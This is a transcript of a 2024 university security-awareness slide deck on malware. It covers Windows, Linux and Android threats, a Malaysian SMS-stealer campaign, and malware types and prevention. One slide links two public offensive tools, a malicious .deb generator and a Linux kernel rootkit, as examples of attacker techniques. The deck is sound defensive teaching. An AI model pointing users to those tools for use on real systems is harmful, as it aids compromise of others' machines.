UniKL 2024 - Phishing Security Awareness: Malware

Transcript

1. Phishing Security Awareness: Malware Friday, 26 January 2024 Fatah Hashim

   (@x86fatah)

2. About Fatah Hashim (发达奇拉) • Fat |发达奇拉 | x86fatah •

   Specializing in Malware Research & Analysis, Focusing on Cross-platform and Windows Analysis, with an Interest in Reverse Engineering. • Blogging at https://www.cookiesec.blog/ • Contact me on https://www.linkedin.com/in/fatah-iix/

3. Disclaimer The views and opinions expressed in this content are

   my own and do not necessarily reflect the views and opinions of any company or organization that I am affiliated with.

4. Table of Content ❑ Introduction to Malware ❑ Malware Platforms

   ❑ Purpose ❑ Initial Access ❑ Types of Malware ❑ Demonstration ❑ Prevention ❑ Warp up ❑ Resource for further study

5. https://www.goodreads.com/quotes/17976-if-you-know-the-enemy-and-know-yourself-you-need

6. Introduction to Malware ❑ Malware is short for (Malicious +

   Software) ❑ Imagine It’s just a real-world black magic ❑ Software programs designed to cause damage or perform other unwanted actions on computer systems ❑ These malicious programs perform a variety of functions, including stealing, encrypting, deleting sensitive data, monitoring user's computer activity without their permission ❑ Common examples of malware include viruses, worms, trojan horses and spyware https://www.shutterstock.com/image-photo/wicca-esoteric-occult-still-life-600nw- 2159811105.jpg

7. Malware Platform – Windows ❑ Critical infrastructure running windows ❑

   Vulnerability landscape , Legacy infrastructure ❑ Legacy code and compatibility: long history with a vast legacy codebase and backward compatibility requirements ❑ TA: Easy to code, Lot of resources & research ❑ Generally true within the historical context, it's important to acknowledge the ongoing improvements in Windows security. no platform is entirely immune to threats.

8. Malware Platform – Linux ❑ Linux operating system offers a

   strong security baseline, but it can still be targeted by hackers and their malicious software ❑ ELF (Executable and Linkable Format) Malware ❑ Fake pkg resources like fake deb, fake rpm, fake ko(kernel module).. ❑ Example TA techniques: ❑ https://github.com/mthbernardes/Derbie -> generate a malicious .deb ❑ https://github.com/m0nad/Diamorphine/tree/master -> LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x/6.x (x86/x86_64 and ARM64) https://bazaar.abuse.ch/browse/tag/elf/

9. Malware Info – Mobile ❑ Specifically designed to target mobile

   devices, such as smartphones and tablets, with the goal of gaining access to private data ❑ Google and Apple invest a lot in security research, but that’s not enough ! ❑ As we have shown time after time, malware is still able to bypass market security! (google play, appstore) ❑ Everyday security vulnerabilities are discovered in a constant basic, and if your device is not patched, you are vulnerable ! https://www.mcafee.com/blogs/other-blogs/mcafee-labs/new-hiddenads- malware-that-runs-automatically-and-hides-on-google-play-1m-users-affected/

10. Malware Platform – Android 1/2 ❑ Malware uses Android’s Accessibility

    Service to take over the phone, displaying a request prompt that would allow it to add itself to the device administrator list ❑ Once the takeover complete. Malware can send an SMS/WhatsApp message containing a specific text to any number, extract text messages and send back to C2, open links, steal data like phone call info. https://ringgitplus.com/en/blog/personal-finance-news/latest-phishing-scam-hides-within-an-app-and-is-disturbingly- sophisticated.html

11. https://www.thestar.com.my/starpicks/2023/12/29/cybersecurity-alert-malware-scams-are-on-the-rise Cybersecurity Alert: Malware scams are on the rise SMS

    Stealer APK use "Kahwin" theme targeting Malaysian: Kad Kahwin Digital APK https://notes.netbytesec.com/2023/06/kahwin-sms-stealer-target-Malaysia.html Malware Platform – Android 2/2

12. Purpose ❑ To hurt others and make money ❑ Financial,

    stealing, encrypting, or deleting sensitive data ❑ Altering or hijacking core computing functions ❑ Monitoring users’ computer activity without their permission ❑ To steal personal, financial, or business information from individual & govs https://shorturl.at/lnzI1 https://www.kaspersky.com/blog/2ch-webcam-hack/11961/

13. Initial Access ❑ Delivered physically to a system through USB

    flash drives or external hard drives ❑ Spam E-Mails and Phishing Attacks ❑ Bundled with other software (crack) ❑ Accessing hacked or compromised webpages

14. Types of Malware - Virus ❑ When executed, replicates itself

    by modifying other computer programs and inserting its own code into those programs ❑ Deleting the existing files, corrupting the running application ❑ Melissa Virus (1999), targets Microsoft Word and Outlook-based systems https://cyberhoot.com/cybrary/melissa-virus/

15. Types of Malware - Trojan ❑ Named after the mythical

    Greek warriors hidden within the Trojan Horse, are malicious software disguised as legitimate programs ❑ Trojans act as wolves in sheep's clothing, luring users into unsuspecting interaction before unleashing their payload ❑ Data theft, system hijacking, or surveillance https://etc.usf.edu/clipart/19300/19346/trojanhorse_19346.ht m

16. DEMO – Trojan (Backdoor & Dropper)

17. Rest Time 5 minutes!

18. Types of Malware - Worm ❑ Malicious software that can

    replicate rapidly and spread across devices within a network ❑ Self-contained, autonomous agents, exploiting vulnerabilities in operating systems and network protocols to burrow into new systems like digital parasites ❑ Disrupting systems, stealing data, others. https://www.researchgate.net/figure/Operation-of-virus-and- worm_fig1_268040374

19. DEMO – Worm

20. Types of Malware - Ransomware ❑ Malicious software designed to

    block access to a computer system until a sum of money is paid. ❑ Payment is demanded in virtual currency, such as Bitcoin. Also, iTunes and Amazon gift cards. ❑ Motive is mostly always money https://www.researchgate.net/figure/The-modus-operandi-of-a-ransomware-attack_fig1_374711715

21. Types of Malware - Others https://www.crowdstrike.com/cybersecurity-101/malware/types-of-malware/

22. Prevention ❑ Be aware of phishing emails with attachments or

    links. ❑ Hover over links in the body of the email to validate the URL ❑ Be aware of suspicious text messaging and emails: Do not click on links or download attachments that you are not expecting. ❑ Use only official apps: Download official apps from the app stores. Do not install from third-party websites. ❑ Install and run anti-malware software and ensure you have the latest security updates. ❑ Update software and operating systems with the latest vulnerability patches. ❑ Remove legacy programs that are no longer supported

23. Warp up ❑ Malware is a serious threat to individuals

    and organizations alike. ❑ However, it is important to note that no security solution is perfect. Malware can still bypass security measures, especially if it is new or sophisticated. ❑ But educating yourself about malware and how to avoid it will reduce the risk of becoming a victim

24. Resource for further study 1/2 https://www.amazon.com/Practical-Malware-Analysis-Hands- Dissecting/dp/1593272901 https://speakerdeck.com/x86fatah/x86-x64- assembly

25. Resource for further study 2/2 https://www.cookiesec.blog/post/Spear-Phishing-Stealer-Targeting-Malaysian-HSBC-E-Mail- Analysis

26. Any Question ?

27. Thank you ! Fatah Hashim (@x86fatah) https://www.linkedin.com/in/fatah-iix/ https://www.cookiesec.blog/